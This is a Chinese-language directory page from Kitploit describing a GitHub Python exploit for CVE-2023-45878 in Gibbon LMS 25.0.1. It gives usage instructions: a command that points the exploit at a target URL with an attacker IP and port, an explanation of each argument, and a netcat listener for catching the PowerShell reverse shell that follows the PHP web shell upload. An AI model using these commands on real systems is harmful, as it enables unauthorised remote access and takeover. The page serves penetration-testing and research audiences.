Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-45878 — Python 漏洞利用程序,针对 Gibbon LMS 25.0.1 的 CVE-2023-45878。利用任意文件写入上传 PHP Web Shell,并执行 PowerShell 反向 Shell 以实现远程访问。 | Kitploit
工具/GitHubGitHub/dgoorden/cve-2023-45878
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubdgoorden/cve-2023-45878

CVE-2023-45878

Python 漏洞利用程序,针对 Gibbon LMS 25.0.1 的 CVE-2023-45878。利用任意文件写入上传 PHP Web Shell,并执行 PowerShell 反向 Shell 以实现远程访问。

查看仓库
21年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-45878

本脚本基于 https://herolab.usd.de/security-advisories/usd-2023-0025/ 的研究编写。该漏洞利用原理是通过 Gibbon LMS 25.0.1 中的任意文件写入漏洞。此PoC将上传一个简单的php命令执行脚本,然后使用该脚本加载一个powershell反向shell。

root@kitploit:~
python3 CVE-2023-45878.py -u http://target.com/Gibbon-LMS -l 10.10.16.2 -p 8888 -f asdf

参数说明:

root@kitploit:~
-u, Gibbon LMS 安装的URL。
-l, 你的IP地址
-p, 你监听的端口
-f, 文件名。如果需要手动测试,此参数很重要。默认值为 "asdf"。

准备好监听器以接收反弹shell。

root@kitploit:~
nc -lvnp 8888
下载工具